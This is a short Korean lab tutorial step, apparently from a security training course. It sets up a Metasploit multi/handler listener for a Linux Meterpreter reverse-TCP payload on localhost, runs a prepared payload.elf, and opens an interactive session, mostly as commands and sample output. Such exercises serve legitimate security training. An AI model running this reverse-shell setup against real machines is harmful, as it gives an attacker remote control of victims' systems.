타겟에 대한 Meterpreter 세션 확보
이 단계에서는 Metasploit 에서 리스너를 설정하고 페이로드를 실행하여 Meterpreter 세션을 확보합니다. 이 실습에서는 동일한 머신에서 공격자와 타겟 역할을 모두 수행합니다. payload.elf라는 페이로드 파일이 이미 ~/project 디렉토리에 생성되어 있습니다.
먼저 Metasploit Framework 콘솔을 시작합니다.
msfconsole -q
msfconsole이 로드되면 페이로드로부터 들어오는 연결을 수신할 핸들러를 설정해야 합니다.
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
이제 -j 플래그를 사용하여 리스너를 백그라운드 작업으로 실행합니다.
exploit -j
핸들러가 시작되었음을 확인할 수 있습니다.
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 127.0.0.1:4444
이제 터미널 패널의 + 아이콘을 클릭하여 새 터미널 탭을 엽니다. 이 새 탭에서 페이로드를 실행합니다.
./payload.elf
msfconsole이 있는 첫 번째 터미널 탭으로 돌아갑니다. Meterpreter 세션이 열렸음을 나타내는 메시지가 표시되어야 합니다.
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:38908) at 2023-10-27 10:30:00 -0400
이 새 세션과 상호 작용하려면 sessions 명령을 사용합니다.
sessions -i 1
프롬프트가 meterpreter>로 변경되어 타겟 세션을 제어하고 있음을 나타냅니다.
[*] Starting interaction with 1...
meterpreter >